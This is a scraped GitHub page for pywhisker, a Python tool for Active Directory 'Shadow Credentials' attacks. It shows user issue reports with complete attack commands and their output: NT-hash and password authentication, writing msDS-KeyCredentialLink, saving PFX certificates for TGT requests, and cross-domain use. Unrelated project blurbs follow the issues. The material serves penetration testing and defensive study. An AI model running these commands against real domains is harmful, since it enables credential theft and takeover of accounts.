shutdownrepo / pywhisker Goto Github PK
View Code? Open in Web Editor NEWPython version of the C# tool for "Shadow Credentials" attacks
License: GNU General Public License v3.0
Python version of the C# tool for "Shadow Credentials" attacks
License: GNU General Public License v3.0
It would be awesome to have pipx support for this useful package so it's even easier to deal with python virtual envs. To make it work the setup.py
or pyproject.toml
file is needed as per docs https://pipx.pypa.io/latest/how-pipx-works/.
While on an engagement I was not able to get a computer account to add shadow credentials to itself. Was this fixed by Microsoft?
pywhisker -t 'vm-dc02$' -a add -d domain.local -u 'VM-DC02$' -H BAB0BB5F7A058A24AE91003A0B80DFDD --dc-ip 192.168.0.100
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: ec2f3908-666b-5f5f-c2bf-0fa4cfe41c6f
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
However I was able to add shadow credentials as the domain admin:
pywhisker -t 'vm-dc02$' -a add -d domain.local -u Administrator -p 'S3cr3tp4ssw0rd' --dc-ip 192.168.0.100
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 21f07708-fffa-26d0-02b0-03c397165d69
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: diJE4LLY.pfx
[*] Must be used with password: tHlLzQkOY2jHGFzauf3Y
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
I also checked for any existing shadow credentials for the targeted computer account but there weren't any.
Hi. Thank you very much for your time writing this tool!
I can successfully add shadow credentials when authenticating using a plaintext password but when I try the same using Kerberos authentication on the same machine in the same "session" it fails with "invalid server address". I have tested all kind of variations of the parameters such as "-d [domain]" and "--dc-ip [DC IP]" in various locations of the command but I always get the same error. Note that I have no issues using for example Impacket's secretsdump script with Kerberos in the same environment.
I also noted that you have not used the "-k" parameter in any of your examples here so I cannot check my command against an example.
Thank you for this great Python port! The README has not been updated to include the --action spray
. I swore that the tool supported it, but couldn't find it until I read the PRs: #6
This addition would help others realize faster that this tool supports this great feature like the C# ShadowSpray tool.
Hi,
Thank you for this tool.
During testing of the new cross-domain shadow credential writing I encountered an issue. As you can see in the pictures, adlab.local\adlab_shadow1
has full control of child.adlab.local\child_domainuser1
but still the writing of shadow credentials fails due to insufficient rights. I have no issues writing shadow credentials within a domain.
The trust involved is a parent-child trust where adlab.local
is the parent domain and child.adlab.local
is the child domain.
When i need generate certificate from domainA.contoso.local to target victimuser in domainB.contoso.local. For authentication i use NT hash with this command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -H :<nthash> -t victimuser -td domainB.contoso.local
All fine.
But in my case domainB ldap signing +channel binding is enabled, and i can't auth with ntlm, because i get error strongerAuthRequired.
And when i ask ticket for [email protected] and then use command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -k --dc-ip <dc ip domainB.contoso.local> -t victimuser -td domainB.contoso.local
I get error KDC_ERR_WRONG_REALM
I know that this version of ldap3 can solve this problem https://github.com/ThePirateWhoSmellsOfSunflowers/ldap3/tree/tls_cb_and_seal_for_ntlm.
I tried to do it myself, but I couldn't succeed.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.